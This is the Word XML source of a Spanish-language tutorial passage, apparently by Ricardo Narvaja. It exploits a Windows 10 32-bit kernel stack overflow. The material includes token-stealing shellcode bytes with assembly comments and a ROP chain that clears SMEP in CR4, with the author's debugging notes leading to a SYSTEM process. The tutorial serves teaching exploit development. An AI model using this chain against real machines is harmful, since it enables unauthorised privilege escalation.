            <wp:docPr id="53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4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Al llegar al popad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6290310" cy="1240790"/>
            <wp:effectExtent l="0" t="0" r="15240" b="16510"/>
            <wp:docPr id="5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4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El stack </w:t>
      </w:r>
      <w:r w:rsidR="008B5B9C">
        <w:t>estaría</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bien</w:t>
      </w:r>
      <w:r w:rsidR="008B5B9C">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B5B9C">
        <w:t>así</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> que debo quitar el add esp, 0c que </w:t>
      </w:r>
      <w:r w:rsidR="008B5B9C">
        <w:t>servía</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> para otro exploit, quitar ese push y cambiar el ret por un retn 8 y </w:t>
      </w:r>
      <w:r w:rsidR="008B5B9C">
        <w:t>debería</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> funcionar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="00C34BCE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRPr="006F027A" w:rsidRDefault="008B5B9C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Podrida</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF" w:rsidRPr="006F027A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ser </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002D26CF" w:rsidRPr="006F027A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>asi</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRPr="006F027A" w:rsidRDefault="00C34BCE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr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b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="808080"/>
          <w:highlight w:val="yellow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= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
          <w:color w:val="00000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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0x90909090</w:t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color w:val="00000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--[ setup]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\x60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pushad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\x64\xa1\x24\x01\x00\x00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eax, fs:[KTHREAD_OFFSET]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I have to do it like this because windows is a little special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 xml:space="preserve"># this just gets the EPROCESS. Windows 7 is 0x50, now </w:t>
      </w:r>
      <w:proofErr w:type="gram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its</w:t>
      </w:r>
      <w:proofErr w:type="gram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0x80.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\x8d\x40\x70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lea eax, [eax+0x70];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\x8b\x40\x10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eax, [eax+0x10];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\x89\xc1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ecx, eax (Current _EPROCESS structure)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win 10 rs2 x86 TOKEN_OFFSET = 0xfc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win 07 sp1 x86 TOKEN_OFFSET = 0xf8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\x8B\x98\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xfc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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ebx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[eax + TOKEN_OFFSET]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--[ copy system PID token]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xba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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\x04\x00\x00\x00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edx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4 (SYSTEM PID)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\x8b\x80\xb8\x00\x00\x00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eax, [eax + FLINK_OFFSET] &lt;-|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\x2d\xb8\x00\x00\x00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sub eax, FLINK_OFFSET           |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\x39\x90\xb4\x00\x00\x00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cmp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[eax + PID_OFFSET],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edx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    |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\x75\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xed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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jnz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                          -&gt;|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win 10 rs2 x86 TOKEN_OFFSET = 0xfc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win 07 sp1 x86 TOKEN_OFFSET = 0xf8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\x8b\x90\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xfc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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edx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[eax + TOKEN_OFFSET]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\x89\x91\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xfc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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mov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[ecx + TOKEN_OFFSET],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edx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--[ recover]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\x61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popad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\x31\xc0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return NTSTATUS = STATUS_SUCCESS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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow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bCs/>
          <w:color w:val="008000"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>\xc2\x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:highlight w:val="yellow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b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="808080"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t># ret</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE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b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="808080"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Probemos este.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iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-AR" w:eastAsia="es-AR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5263515" cy="1501775"/>
            <wp:effectExtent l="0" t="0" r="13335" b="3175"/>
            <wp:docPr id="5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4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pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="008B5B9C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Ahí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llegue al mismo punto funcionara</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002D26CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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No, aun crashea falta algo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>más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>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Es muy probable que el pop ebp cuando no overflodea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hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-AR" w:eastAsia="es-AR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262245" cy="1517015"/>
            <wp:effectExtent l="0" t="0" r="14605" b="6985"/>
            <wp:docPr id="5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4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pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:hint="default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Que saca del stack ese valor antes del retn8 sea el culpable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-AR" w:eastAsia="es-AR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="1221105"/>
            <wp:effectExtent l="0" t="0" r="8890" b="17145"/>
            <wp:docPr id="57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4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pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:hint="default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 xml:space="preserve">Ya que </w:t>
      </w:r>
      <w:r w:rsidR="008B5B9C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>después</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> setea esp con ese valor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="00C34BCE">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:hint="default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 xml:space="preserve">Cambiare </w:t>
      </w:r>
      <w:r w:rsidR="008B5B9C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>allí</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> para que sea retn solo y no retn asi vuelve y luego puedo acomodar ebp en mi shellcode.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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>input</w:t>
      </w:r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 =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>("&lt;I", nt + 0x519770) *2 #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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>input</w:t>
      </w:r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 +=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("&lt;I", nt + 0x11fc10)  #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mov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 eax, cr4 -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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>input</w:t>
      </w:r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 +=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>("&lt;I", nt + 0x51976f)  # pop ecx;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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>input</w:t>
      </w:r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 +=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>("&lt;I", 0xFFEFFFFF)  # to disable smep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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>input</w:t>
      </w:r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 +=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("&lt;I", nt + 0x50095c)  # and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eax,ecx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>;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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>input</w:t>
      </w:r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 +=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("&lt;I", nt + 0x11fc1e)  # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> cr4,eax;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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>input</w:t>
      </w:r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 +=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("&lt;I",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int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>(buf))   # a shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRPr="006F027A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Y al inicio de mi shellcode pongo un pop ebp para que lo levante del stack antes del pushad.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 xml:space="preserve">Ahora si ya funciona perfecto hice correr un notepad porque Microsoft en Windows 10 a veces restringe el uso de llamar a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>calc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> para joder </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>jeje</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>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noProof/>
          <w:lang w:val="es-AR" w:eastAsia="es-AR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="3669665"/>
            <wp:effectExtent l="0" t="0" r="3175" b="6985"/>
            <wp:docPr id="5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4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hint="default"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="008B5B9C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Ahí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se ve el usuario SYSTEM o sea que pudimos deshabilitar SMEP y elevar privilegios en Windows 10 de 32 bits.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="008B5B9C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En 64 bits es igual el metodo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, por supuesto hay que adaptar los offsets de las estructuras, y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>también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hay que guardar el valor de cr4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>,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para llamar una vez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>más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para hacer un segundo rop que lo restaure porque </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>si no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en 64 bits el PATCH GUARD cada tanto scanea y se da cuenta del cambio y te crashea la </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>máquina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, pero en si es el mismo metodo mas trabajoso, pero es la misma </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>idea.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 xml:space="preserve">Hasta la </w:t>
      </w:r>
      <w:r w:rsidR="008B5B9C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>próxima</w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> parte </w:t>
      </w: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Ricardo Narvaja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sectPr w:rsidR="00C34BC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784782"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5A784782"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing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FC6BB9"/>
    <w:rsid w:val="002D26CF"/>
    <w:rsid w:val="006F027A"/>
    <w:rsid w:val="008B5B9C"/>
    <w:rsid w:val="00C34BCE"/>
    <w:rsid w:val="01D9749D"/>
    <w:rsid w:val="0242494E"/>
    <w:rsid w:val="028670A5"/>
    <w:rsid w:val="05472CC8"/>
    <w:rsid w:val="0A3160D3"/>
    <w:rsid w:val="0B9978E9"/>
    <w:rsid w:val="0C9C254C"/>
    <w:rsid w:val="0DDA1C35"/>
    <w:rsid w:val="124041B6"/>
    <w:rsid w:val="130B36D2"/>
    <w:rsid w:val="1437610F"/>
    <w:rsid w:val="1A9D48B4"/>
    <w:rsid w:val="1E825444"/>
    <w:rsid w:val="1EBC51E7"/>
    <w:rsid w:val="1FFC6BB9"/>
    <w:rsid w:val="200C522E"/>
    <w:rsid w:val="21682F23"/>
    <w:rsid w:val="224E21B8"/>
    <w:rsid w:val="22BC2951"/>
    <w:rsid w:val="22D024AD"/>
    <w:rsid w:val="22D26B67"/>
    <w:rsid w:val="242E68CE"/>
    <w:rsid w:val="29051F06"/>
    <w:rsid w:val="29C523F9"/>
    <w:rsid w:val="2C094C1B"/>
    <w:rsid w:val="2D576CAA"/>
    <w:rsid w:val="2DEA64E1"/>
    <w:rsid w:val="2F144576"/>
    <w:rsid w:val="30E50D11"/>
    <w:rsid w:val="32B87D6F"/>
    <w:rsid w:val="3C8A451E"/>
    <w:rsid w:val="3F0A5119"/>
    <w:rsid w:val="42105851"/>
    <w:rsid w:val="43457B9E"/>
    <w:rsid w:val="438C5B4C"/>
    <w:rsid w:val="44F17DBB"/>
    <w:rsid w:val="45154D11"/>
    <w:rsid w:val="4692433E"/>
    <w:rsid w:val="472A2C8E"/>
    <w:rsid w:val="48947B12"/>
    <w:rsid w:val="4AD62A05"/>
    <w:rsid w:val="4F912370"/>
    <w:rsid w:val="509B757B"/>
    <w:rsid w:val="55694A81"/>
    <w:rsid w:val="58846554"/>
    <w:rsid w:val="5C092E45"/>
    <w:rsid w:val="5C3A3B4B"/>
    <w:rsid w:val="5C730429"/>
    <w:rsid w:val="5CF83A7F"/>
    <w:rsid w:val="5F9F426E"/>
    <w:rsid w:val="6324541A"/>
    <w:rsid w:val="6D837EA4"/>
    <w:rsid w:val="6DEA22B6"/>
    <w:rsid w:val="70057467"/>
    <w:rsid w:val="74C226C2"/>
    <w:rsid w:val="77B62C6B"/>
    <w:rsid w:val="78EC3CE9"/>
    <w:rsid w:val="78F76CE3"/>
    <w:rsid w:val="794F6969"/>
    <w:rsid w:val="7A5C06CB"/>
    <w:rsid w:val="7BAE460A"/>
    <w:rsid w:val="7DE2534F"/>
    <w:rsid w:val="7E6F7BAD"/>
    <w:rsid w:val="7FB8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FA37A9E-D731-4012-B758-13F039F2F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pPr>
      <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN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  <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="72"/>
      <w:szCs w:val="72"/>
    </w:rPr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flababah/cpuid.py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drive.google.com/open?id=1VbN3kipWQe9ti7WGheGSmbG9xOn4uaQW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hyperlink" Target="https://www.coresecurity.com/system/files/publications/2016/05/Windows%20SMEP%20bypass%20U%3DS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2509</Words>
  <Characters>13800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Jorge Narvaja</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-02-05T10:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-02-06T12:44:00Z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